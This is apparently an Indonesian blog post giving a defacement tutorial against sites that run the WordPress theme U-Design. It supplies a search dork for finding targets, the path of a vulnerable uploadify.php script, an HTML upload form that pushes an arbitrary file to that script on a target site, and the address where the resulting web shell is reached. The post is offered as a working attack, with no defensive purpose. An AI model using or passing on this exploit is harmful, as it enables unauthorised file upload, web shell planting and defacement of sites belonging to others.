Header Ads

Defece Menggunakan Wordpress Themes U-DESIGN Exploit




#Type: CSRF & Xampp, Uploadify
#Tested: Windows XP, 7, 8, BackBox
#CMS: WordPress

Dork: inurl:themes/u-design/ < kembangin

Exploit: /wp-content/themes/u-design/scripts/admin/uploadify/
uploadify.php


Kalau target vuln , maka tampilannya blank ( putih semua )pas di exploit


Simpan CSRF dengan Ext .html ( x.html )
 <form method="POST" action="http://www.site.com/wp-content/themes/u-design/scripts/admin/uploadify/
uploadify.php"
enctype="multipart/form-data"><input type="file" name="Filedata" /><button>Upload</button><br />
</form>


Akses Shell : site.com/myshell.php

No comments

Powered by Blogger.